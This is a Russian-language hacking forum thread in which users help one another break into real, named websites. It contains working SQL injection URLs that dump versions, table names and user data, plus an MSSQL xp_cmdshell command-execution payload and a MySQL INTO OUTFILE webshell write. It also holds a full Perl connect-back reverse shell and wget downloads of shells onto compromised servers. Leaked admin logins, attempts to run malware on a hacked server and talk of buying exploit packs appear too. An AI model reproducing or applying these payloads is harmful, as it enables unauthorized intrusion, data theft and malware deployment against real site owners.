И так
Твой запрос приводит к ошибке.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
Т.е. intval() нету, что неплохо.
Зато просто ограничение в 2 символа :)
Если хочешь, крути скулю в лимит 2 символа ;)
Конечно хочу, просто покажи пожалуйста как версию вывести, а дальше уж я сам своё чёрное дело сделаю.

Упс, не заметил по этому поводу демократию, извиняюсь. Всё понял, как бы SQL, но в тоже время и не SQL вовсе =)))
Пасиба. Обломился празник ;(

Слышал, что через SQL в базе данных MSSql реально выполнить cmd команды, но дел с этой БД никогда не имел, если это не миф, то просьба, показать на этом примере:
sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version—
Или объясните плз, при каком условии можно выполнить cmd команду на сервере.

www.site.ru/index.asp?user=1'; exec master..xp_cmdshell 'CMD COMMAD HERE' --

Слышал, что через SQL в базе данных MSSql реально выполнить cmd команды, но дел с этой БД никогда не имел, если это не миф, то просьба, показать на этом примере:
sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version—
Или объясните плз, при каком условии можно выполнить cmd команду на сервере.
Преимуществом этой СУБД есть то, что в скулях можно закрывать один запрос (;) и выполненять другой... Поясню: Если есть уязвимый код, н.п.:
mssql_query('SELECT * FROM news WHERE id='.$_GET['id'].);
При подставке в id, н.п. 1, запрос в БД будет выглядеть так:
SELECT * FROM news WHERE id=1
Это понятно :) Но можно сделать так:
?id=1; exec master..xp_cmdshell 'здесь комманда консоли винды'тогда первый запрос будет
SELECT * FROM news WHERE id=1
второй:
exec master..xp_cmdshell 'здесь комманда консоли винды'
Про "exec", "master..xp_cmdshell" почитай в гугле :)

PS: Но exec не всегда разрешен. В большинстве случаев - только при пользователе "su" (это как root в MySQL)

Пользователь sa =)
Nightmare - https://forum.antichat.ru/thread30501-mssql.html

Всем привет,такая проблема:
Есть рут от пхпадмина phpMyAdmin 2.6.2-Debian,
Выполняю запрос:
select '<?php eval($_GET[e]); ?>' into outfile '/var/www/new/pma/1.php'
получаю

SQL-запрос: Документация

SELECT '&lt;?php eval($_GET[e]); ?&gt;'
INTO OUTFILE '/var/www/new/pma/1.php'

Ответ MySQL: Документация
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
пути правельные из пхпинфо взял.
Зарание спасибо

Попробуйте

SELECT ... FROM sometable INTO OUTFILE ...

где sometable - имя существующей таблицы

krypt3r спасибо уже что то ,
SQL-запрос: Документация

SELECT '&lt;?php eval($_GET[e]); ?&gt;'
FROM db
INTO OUTFILE '/var/www/osiatis_new/landesk/ll.php'

Ответ MySQL: Документация
#1 - Can't create/write to file '/var/www/new/11/ll.php' (Errcode: 13)
все равно каким то боком кавычки мешают(

jokester
выполняю запросы в поле
Выполнить SQL запрос(ы) на БД
UPD можешь ради интереса попробовать вот так:
вылетает
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

И проверил пользователя
root ALL PRIVILEGES
:confused:
К примеру отбросим фильтр кавычек ,и смтря на первую ошибку получается что запись невозможна?

Shadrin
Хех, это я протупил, krypt3r прав, у тебя база просто 4, я неподумал. Теперь просто ошибка записи в папку. тоесть прав нет попросту Ищи папку на запись.

Ваш SQL-запрос был успешно выполнен (Запрос занял 0.0661 сек)
SQL-запрос:
SELECT '<?php eval($_GET[e]); ?>'
FROM db
INTO OUTFILE '/tmp/1'
а тут норм все :confused: ..
А как быстро найти папку с правами на запись?
кроме гугла и сканеров котрые по линкам ходят

Ключевая фраза

Теперь просто ошибка записи в папку. тоесть прав нет попросту Ищи папку на запись.
=)
На запись в /tmp права всегда есть.

нет, это ясно,вопрос был в том что кавычки не ружутся при запись в tmp..вообщем папку надыбыл щас писать будемс
всем большое спасибо!

http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

О мне выдаёт следующее:
Parse error: parse error, unexpected $ in /www/kinogild/www/htdocs/stalkerfest/page.php(44) : eval()'d code on line 1

Как это понимать? Растолкуйте кто нибудь пожалуйста!

http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(), database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--
вот как бы,если это в виду имел

http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(), database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--
вот как бы,если это в виду имел

Да, имел ввиду именно это. Спасибо. Я просто не сообразил что в желтом поле выводился номер принтабельного поля, думал ошибка какаято.

Зачем знак комментария в конце? И без него то же самое отображает вроде

http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,0x706870696e666f28293b,5,6,7 ,8,9,10,11,12,13,14/*

Ключевая фраза

=)
На запись в /tmp права всегда есть.
Не всегда :o

Зачем знак комментария в конце? И без него то же самое отображает вроде
я привык,не всегда нормально отображается без него

Не пойму почему не делается бек-коннект :( Делаю следующее...

У себя в cmd прописал start nc -l -p 80

Залил перловый бэкдор

#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
# Resolving HostName
# Connecting... 127.0.0.1
# Spawning Shell
# Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== Backdoor -=====- Hello Melkiy ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print " Resolving HostName\n";
print " Connecting... $ARGV[0] \n";
print " Spawning Shell \n";
print " Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

С шелла пишу perl sd.pl 123.123.123.123[свой IP] 80

И выдаёт:

--== Backdoor -=====- Hello Melkiy ==--

[-] Unable to Connect Host


В чём проблема? :(

P.S Пробовал другие порты, тоже самое...

Пинг с шелла идет на ваш IP?

Пинг с шелла идет на ваш IP?



C:\Documents and Settings\Администратор>ping ****.ru

Обмен пакетами с ****.ru [**.**.**.53] по 32 байт:

Ответ от **.**.**.**: Заданная сеть недоступна.
Превышен интервал ожидания для запроса.
Ответ от **.**.**.**: Заданная сеть недоступна.
Превышен интервал ожидания для запроса.

Статистика Ping для **.**.**.**:
Пакетов: отправлено = 4, получено = 2, потеряно = 2 (50% потерь),
Приблизительное время приема-передачи в мс:
Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек


:(

Превышен интервал ожидания для запроса.
Ответ от **.**.**.**: Заданная сеть недоступна.

Подожди может

еще вопрос... когда выполняю комманду perl perl.pl [свой IP] 80 сервер тухнет! в чем проблема?

[500] Internal Server Error

и так на каждом шелле:( не хочет делать бэк-коннект на мой комп, хотя нет, попробовал с деда - тоже самое

--

Это пиздец какой-то =( ни один сервер не может подключится...

--== Backdoor -=====- Hello Melkiy ==--

[-] Unable to Connect Host


в чём проблема-то?:(


//Разобрался

.:[melkiy]:.: может у тебя не выделенный ip адрес?

Подскажите где сдесь админка?
_http://infosfera.sfo.ru/a/index.php

http://infosfera.sfo.ru/a/forum/admin/

http://infosfera.sfo.ru/a/forum/admin/
Вроде не совсем то....

http://infosfera.sfo.ru/phpmyadmin/

не админка, но может оказаться и полезней:)

PS: Админку что-то своими средствами не нашел, правда искал минут 5. Бежать надо.

Вроде не совсем то....
Почему же? Я уже и бекконнект сделал :)

Почему же? Я уже и бекконнект сделал :)
странно,у меня есть и логин и пасс, но чёт не пускает)

Почему же? Я уже и бекконнект сделал :)
всё работает)спс биг)эт я напутал)))

Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все

попробуй покрутить как слепую скуль.

Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
В зависимости от конкретной ситуации... дай реальный пример...

Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
-12/**/ANd/**/1=2/**/uNioN/**/SeLecT/**/1,2,3/*
Попробуй так что ле...
Без пример сложновато ;)

Существуют ли бесплатные связки эксплоитов?
Если да, то какие лежат в паблике?

Существуют ли бесплатные связки эксплоитов?
Если да, то какие лежат в паблике?
В паблике такие связки, которые паляться антивирусами.
А в привате, за очень неплохие деньги, антивирами не будет палиться, и распуститься быстро.

Прив связки не так то и сложно достать...

Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Возможно Apache с mod_security, по обходу, попробуй POST'ом послать.

Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все

Пробуй вот так
http://site.net/index.php?id=777+union+select+1,2,3/* должно быть корректно, затем подставь -777 и ищи вывод

зачем тебе and+1=2 ?!?!

http://www.mibf.ru/index.php?id=23'
Собственно вопрос, как добиться вывода в этой скуле...

там вообще прикол:

http://www.mibf.ru/index.php?id=-23+or+1=1

http://www.mibf.ru/index.php?id=23+union+select+null,null,null,null,n ull,null,null,0x73716C,null,null+limit+1,1+--+
редиректит на урл в котором вывод
http://www.mibf.ru/index.php?id=999999+union+select+null,null,null,nu ll,null,null,null,concat_ws(0x3a,version(),user()) ,null,null+--+

Прив связки не так то и сложно достать...
Миллионер? ;)
Приватные связки, неплохо стоят, но если делается что то "шикарное", то деньги можно достать.

Дайте пожалуйста ссыль на онлайн hex редактор, гдето потерял, пол дня ищю....пожалуйста

isfuck.me/?tools=sql
ascii encode hex and char

Миллионер? ;)
Приватные связки, неплохо стоят, но если делается что то "шикарное", то деньги можно достать.
Приват льют на право и на лево и при хороших знакомствах у тебя будет все, что необходимо + файлообменники (очень уж часто не ставят пароли на архивы :))

2Dyxxx, спс, но уже разобрался...

Приват льют на право и на лево и при хороших знакомствах у тебя будет все, что необходимо + файлообменники (очень уж часто не ставят пароли на архивы :))

2Dyxxx, спс, но уже разобрался...
хорошую связку ты даже не купишь! а ты говроишь найти на файлообменике, дураков в этом бизе нет ;)

Приват льют на право и на лево и при хороших знакомствах у тебя будет все, что необходимо + файлообменники (очень уж часто не ставят пароли на архивы :))

2Dyxxx, спс, но уже разобрался...
Ну вот это возможно :)
Дайте пожалуйста ссыль на онлайн hex редактор, гдето потерял, пол дня ищю....пожалуйста
http://www.softportal.com/software-948-winhex.html

Народ привет. Извините если боаян.
Есть такая штука но не уверен что ето уязвимость.
На форуме IPB версия 1.3.1 при вводе в урл такой строки
http://[target]/ipb/index.php?act=Online&st=-1
видает такое:
http://keep4u.ru/imgs/b/2009/10/09/99/996b6ce0cfeae8e1a027d4e9d2d48dec.jpg
Что можно с етим сделать? или ничего?

И еще если после запуска сплоита на перле с командной строки, там где должен находиться хеш пароля админа написало слово FAILED. Значит етим сплоитом ничего уже не сделаеш?

Народ привет. Извините если боаян.
Есть такая штука но не уверен что ето уязвимость.
На форуме IPB версия 1.3.1 при вводе в урл такой строки
http://[target]/ipb/index.php?act=Online&st=-1
видает такое:
Что можно с етим сделать? или ничего?

И еще если после запуска сплоита на перле с командной строки, там где должен находиться хеш пароля админа написало слово FAILED. Значит етим сплоитом ничего уже не сделаеш?
Да, там сразу SQL Иньекция идёт.

Скажите, пожалуйста, как залить перл шелл ? Сложность в том, что нужно заливать в ascii, а я не знаю как это сделать за неимением фтп-доступа.. доступны wget, lynx. может его создать прям на хосте можно(имется пхп веб шелл, доступна system() )

Залей шелл куда-нибудь, на тот же народ.
потом скачай его на сервер командой
wget http://yoursite.com/perlshell.pl

только вопрос зачем перл шелл, если уже есть пхп-шелл, при этом даже доступны системные команды?

скомпилил, запускаю рут сплойт, пишет:
/bin/sh: line 5: ./a: Permission denied
что это значит ???

скомпилил, запускаю рут сплойт, пишет:
/bin/sh: line 5: ./a: Permission denied
что это значит ???
ну а ты сам-то как думаешь? М.б. перевести эту надпись?

не боись, переводи, и тебе откроются великие тайны

ну а ты сам-то как думаешь? М.б. перевести эту надпись?

не боись, переводи, и тебе откроются великие тайны

Может есть вариант это обойти ? Я не совсем врубаюсь это интерпретатор не может его запустить или сам сплойт не может sh запустить ?

скомпилил, запускаю рут сплойт, пишет:
/bin/sh: line 5: ./a: Permission denied
что это значит ???
Перевожу, ибо не могу на это смотреть
/bin/sh строка 5 ./a доступ запрещен

З.Ы писец,в разделе уязвимости переводом занимаюсь!

Собственно вопрос, как добиться вывода в этой скуле...
_http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),0x27,10+--+
грубо говоря чтоб был редирект нужно чтобы 9-е поле возвращало нечисловой результат.

2totem
chmod +x a

Подскажите плиз
http://www.dvds4vets.org/admin/
нашел лог и пасс Administrator:Larry
пас не был зашифрован, но в админку не пускает, в чём ошибка?

Подскажите плиз
http://www.dvds4vets.org/admin/
нашел лог и пасс Administrator:Larry
пас не был зашифрован, но в админку не пускает, в чём ошибка?

1) Данные могут быть не 100% правильные, т.к.может ты с другой БД вытащил, или что-нибудь еще...
2) Админка может быть поддельная

2Torentte

Логин stev444
Пароль Larry

http://www.trancosoreceptivo.com.br/pt-br/publica/passeios.php?tipo=2&id=11'

возможно это дальше раскрутить?

http://www.trancosoreceptivo.com.br/pt-br/publica/passeios.php?tipo=2&id=11'

возможно это дальше раскрутить?



А в чем проблема? о_0
http://www.trancosoreceptivo.com.br/pt-br/publica/passeios.php?tipo=2&id=-11+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3--

P.S.:
Не забывайте пробелы убирать!

Люди, помогите найти таблу с паролькой, я все 70 перебрал, нет там паролей блин...плиз

http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,table_name,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21%20FROM%20INF ORMATION_SCHEMA.TABLES%20LIMIT%201,1%20--

Люди, помогите найти таблу с паролькой, я все 70 перебрал, нет там паролей блин...плиз

http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,table_name,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21%20FROM%20INF ORMATION_SCHEMA.TABLES%20LIMIT%201,1%20--
Никто за тебя перебирать ничего не будет! Пища для размышления:
_ttp://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,group_concat(ta ble_name+separator+0x0a),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.TABLE S+where+table_schema=0x6265726479616e735f676f72706 f7274616c+--+

Скажите, пожалуйста, можно ли узнать какие демоны запущены на сервере, если смотреть не из под рута? Если так нельзя, то как их искать и проверять от какого пользователя тот или иной работает ?

Имею шелл на виндовом серванте.
Подскажите как запустить .exe файл если известен точный путь.
C:\virus.exe

так не получается, /c C:\virus.exe, так тоже не получается, а как правильно?

Имею шелл на виндовом серванте.
Подскажите как запустить .exe файл если известен точный путь.
C:\virus.exe

так не получается, /c C:\virus.exe, так тоже не получается, а как правильно?
В ковычки пробывал брать путь вместе с названием файла?

пробовал

cd c:\
virus.exe

так порутай его и запусти, в винде вроде не сложно это сделать :)

попробуй

CD\
cmd /k file.exe

Nightmarе, так и запускай
C:\Virus.exe
Если не помогает:
cd /d c:\
virus.exe

так порутай его и запусти, в винде вроде не сложно это сделать :)Порутать винду? :)

положил рядом с файлом php скрипт с текстом:
<?php
system('GOOGLEUPDATE.EXE');
?>
При ссылке на скрипт выдаёт
PHP Warning: system() [function.system]: Unable to fork [GOOGLEUPDATE.EXE] in E:\server\lol.php on line 2
это выходит нельзя .exe запускать?

остальные способы тоже не пашут

Это выходит что надо путь попробовать прописать к файлу.Попробуй.

а разве не так в винде запускать надо?
start calc.exe
хотя наверн не принципиально, туплю я ;)

Это выходит что надо путь попробовать прописать к файлу.Попробуй.
полный путь в разных вариантах так же не помог

http://anthropology.ru/admin/
нашел лог и пасс, но чёт не пускает, в чём проблема?
Вот один из логинов dima:123
И сдесь аналогично
http://ocenshik.mostpp.ru/admin/
policor:112233
Заранее благодарен!

2Nightmarе
если перевести оно не может создать дочерний процесс. а чего не может это уже как говорится извините....

http://www.sti.ru/acter.php?id=1
Через сипт подобрал таблицы, но данные с них не хотят опубликовыватся
в чём может быть проблема?

//Разобрался: Выводятся через браузер, кто подскажет почему через сипт не хочет?

http://www.sti.ru/acter.php?id=1
Через сипт подобрал таблицы, но данные с них не хотят опубликовыватся
в чём может быть проблема?

//Разобрался: Выводятся через браузер, кто подскажет почему через сипт не хочет?

http://www.sti.ru/acter.php?id=-1+union+select+1,version()+--+-

http://www.sti.ru/acter.php?id=-1+union+select+1,version()+--+-
у меня в другом проблема, логины у меня выводятся, а пароли почему-то не хотят((

_http://www.prodnepr.dp.ua
Подскажите где сдесь админка
Заранее спс))

Юзай PelmeskO scanner (https://forum.antichat.ru/thread40031.html), может найдёшь :)

Здравствуйте помогите пожалуйста с этим сайтом http://www.avtomagnitoly.ru/?bOrdersLook=1' пытался подобрать кол-во полей немогу может через limit юзать?хотя тоже пытался ничего неполучается подскажите пожалуйста в каком направление копать скулу!

А в чем разница твоей сслыки и вот этой?


http://www.avtomagnitoly.ru/?bOrdersLook=1

http://www.avtomagnitoly.ru/?bOrdersLook=1' на той которой дал показал что там скула и спрашиваю в каком направление расшарить её!

Разницы между твоей страничкой и страничкой которую дал пашкела никакой и скули там никакой!

http://www.avtomagnitoly.ru/?bOrdersLook=1' на той которой дал показал что там скула и спрашиваю в каком направление расшарить её!
Это не SQl inj.
ТС ты чуиш разницу между этим
http://www.avtomagnitoly.ru/?bOrdersLook=1'
и этим
http://www.avtomagnitoly.ru/?bOrdersLook=1
Как я вижу, разницы здесь нет
т.е. на запрос нельзя повлеять т.к. нет выводимых полей и сам скрипт функцианирует неправельно

http://www.avtomagnitoly.ru/?bOrdersLook=1' на той которой дал показал что там скула и спрашиваю в каком направление расшарить её!


Тама скули нету.
Зато она есть здесь:
http://www.avtomagnitoly.ru/?strSearchForValue=1'/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*

5.0.27:eshop@localhost:eshop-avtomagnitoly

Как боротся с такими каракулями чтобы был нормальный html ответ?

К примеру: http://img185.imageshack.us/img185/3456/20699052.jpg

Если же взять другой сендер то какой лучше брать для этого дела?

Как боротся с такими каракулями чтобы был нормальный html ответ?

К примеру: http://img185.imageshack.us/img185/3456/20699052.jpg

Если же взять другой сендер то какой лучше брать для этого дела?

Удали Accept-Encoding. Всю стороку нафиг с пакета

Скажите пожалуйста, а может быть такое что паролей на админку нет в базе?
Перерыл уже всё что можна, нашол только на юзеров.
Вот таблы:http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,group_concat%28 table_name+separator+0x0a%29,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.T ABLES+where+table_schema=0x6265726479616e735f676f7 2706f7274616c%20--

Скажите пожалуйста, а может быть такое что паролей на админку нет в базе?
Перерыл уже всё что можна, нашол только на юзеров.
Вот таблы:http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,group_concat%28 table_name+separator+0x0a%29,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.T ABLES+where+table_schema=0x6265726479616e735f676f7 2706f7274616c%20--
Конечно может :)

пароль может быть в файле или щашит в сам скрипт.

Что самое интересное, я эту скулю крутил буквально, то ли вчера, то ли позавчера и там на админке была бэйсик авторизация, а сейчас нет :) чудеса ёпт ;)

А может вообще храниться в другой базе с другим юзером куда прав через попасть через эту скулю нет.Но это как вариант)

ребя подскажите инфу про сайтик:
http://lenagames.com/astra/jigsaws/

сайт вроде допотопный, вылазит форма авторизации, пробовал скачать сайт и полазить внутри, ничего интересного кроме java скриптов не нашёл, а папка jigsaws без авторизации никак.

В той папке лежат платные картинки для пазлов :)
Есть прога игра с пазлами, которая региться, а потом отсылает данные по вышеизложенному адресу, а в ответ мне приходит, что-то типа неправильный ключ,
нашёл и поставил ломанную прогу предыдущей версии этих пазлов и посмотрел как она лезет на сайт через Http Analyzer:
GET /astra/jigsaws/aertsen_p_peasants.exe HTTP/1.0
Host: www.lenagames.com
Accept: www/source, text/html, video/mpeg, image/jpeg, image/x-tiff
Accept: image/x-rgb, image/x-xbm, image/gif, */*, application/postscript
From: bj601_download
Content-type: application/x-www-form-urlencoded

"bj601_download" - как я понял это логин
пароль ломанный состоял из 24 символов (символы от A до F и от 0 до 9)

возможен ли метод перебора по моим параметрам или есть способы попроще?

Вот эта папка (в которой платные картинки) стоит по Basic-авторизацией.

предлагаете брутить?

предлагаете брутить?
Да. Либо еще можно найти уязвимость и прочитать .htpasswd, но я думаю, что там их нету, т.к. сайт на HTML...

мдя, словарик больше Tb будет, брут не получится

А как можно вывести рабочие столбцы вот тут?
http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361 union select 1,2,3 --
стандартное добаление '-' и изминение значения страницы приводит к ридиректу на страницу 404

нету полей для вывода...
http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361+and+1=0+union+select+1,2,3+--+-
пробуй как слепую покрутить....

нету полей для вывода...
http://www.sonyshop.kiev.ua/index.php?t=item_det&id=1361+and+1=0+union+select+1,2,3+--+-
пробуй как слепую покрутить....
ха, пробовал, не видно)

А вот ещё вопросик. В скуле
http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,version%28%29,4,5,6, 7,8,9,10,11,12,13,14,15/*
Выводит вот такое Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
так как первый раз такое вижу, вопрос, что это и как с ним бороться?

ха, пробовал, не видно)

А вот ещё вопросик. В скуле
http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,version%28%29,4,5,6, 7,8,9,10,11,12,13,14,15/*
Выводит вот такое Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
так как первый раз такое вижу, вопрос, что это и как с ним бороться?

http://trade.polesye.net/catalog.php?catid=2&id=176%20union%20select%201,2,unhex(hex(version()) ),4,5,6,7,8,9,10,11,12,13,14,15/*

Одни и те же вопросы.....

Спасибо но....
Access denied for user 'trader'@'localhost' to database 'INFORMATION_SCHEMA'

Спасибо но....
Access denied for user 'trader'@'localhost' to database 'INFORMATION_SCHEMA'
Головой умеешь думать?
Так то тебе дали рабочий пример.
Т.к. нету запроса к INFORMATION_SCHEMA.
Так что запрос который ты послал сейчас, уже твои проблемы.
Ибо вообще нету прав к INFORMATION_SCHEMA.

Спасибо но....
Access denied for user 'trader'@'localhost' to database 'INFORMATION_SCHEMA' В 5й ветке можешь узнать имена столбцов в таблице (если знаешь имя таблицы): https://forum.antichat.ru/showpost.php?p=1494440&postcount=10

Имеется следующий код на пхп:
if(is_file("modules/rankings/$_POST[sort].php")){include("modules/rankings/$_POST[sort].php");}
Можно ли , изменяя $_POST[sort], добиться удаленного инклуда или же инклуда локальных файлов без .php?
Ну попробую добавить нулевой байт и проверить.

удаленного нет, LFI - да.

Имеется следующий код на пхп:
if(is_file("modules/rankings/$_POST[sort].php")){include("modules/rankings/$_POST[sort].php");}
Можно ли , изменяя $_POST[sort], добиться удаленного инклуда или же инклуда локальных файлов без .php?
Ну попробую добавить нулевой байт и проверить.
Почему бы и нет?
Просто is_file() проверяет, существует файл или нет.
Если существует > загружает.
Несуществует > Незнаю, кода дальше нету.

Удалённого несможешь.

Как я понимаю, is_file(); не позволит инклудить удаленный файл, а вот с локальным что-то не могу разобраться. Если добавляю в конец %00, то он что-то конец не отбрасывает.

подскажите плз


непойму как регулярки обмануть..
И откуда ты раздобыл такую увлекательную задачку..

он что-то конец не отбрасывает.
Как вы изволили выразится "конец отбросит" если
magic_quotes_gpc = Off

А удалённо не получится т.к. путь никуда не деть

Как сделать дамб БД при таком раскладе
http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from +(select+*+from+(select+name_const((select+concat( email,0x3a,first_name,0x3a,last_name,0x3a,phone)+f rom+users+limit+0,1),1),name_const((select+concat( email,0x3a,first_name,0x3a,last_name,0x3a,phone)+f rom+users+limit+0,1),1))a)b)
Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет).

Как я понимаю, is_file(); не позволит инклудить удаленный файл, а вот с локальным что-то не могу разобраться. Если добавляю в конец %00, то он что-то конец не отбрасывает.
is_file() лишь проверка на существование файла.
А как уже написал jokester, директорию некуда не денешь.
Возможен фильтр на %00 ,%0D пробуй, %0A.

to 2Fed123
видел я парсер на перле, помоему его в последнем хакере выкладывали

Как сделать дамб БД при таком раскладе
http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from +(select+*+from+(select+name_const((select+concat( email,0x3a,first_name,0x3a,last_name,0x3a,phone)+f rom+users+limit+0,1),1),name_const((select+concat( email,0x3a,first_name,0x3a,last_name,0x3a,phone)+f rom+users+limit+0,1),1))a)b)
Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет).
Проще будет самому написать.

Ctacok
Напиши,буду очень признателен

Ctacok
Напиши,буду очень признателен
Не силён в Perl.
Попробуй сам написать.
Если будут вопросы пиши сюда:
https://forum.antichat.ru/
threadedpost1594515.html#post1594515 .

Это если на PHP будешь писать.

А если на Perl:
https://forum.antichat.ru/thread40897.html

Ctacok жжет ))
2Fed123 цык (http://rapidshare.com/files/292567114/grab.zip.html)
разберешся там просто
цэ грабер с хакера

Помогите раскрутить скулю (добиться вывода)...

узнаем что есть 21 поле
http://www.enext.ua/index.php?node=770+order+by+21--

http://www.enext.ua/index.php?node=-770+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--
вывода нет...

Ща набегут и помогут, а пока вот,пробуй сам раскрутить)
http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5

Ща набегут и помогут, а пока вот,пробуй сам раскрутить)

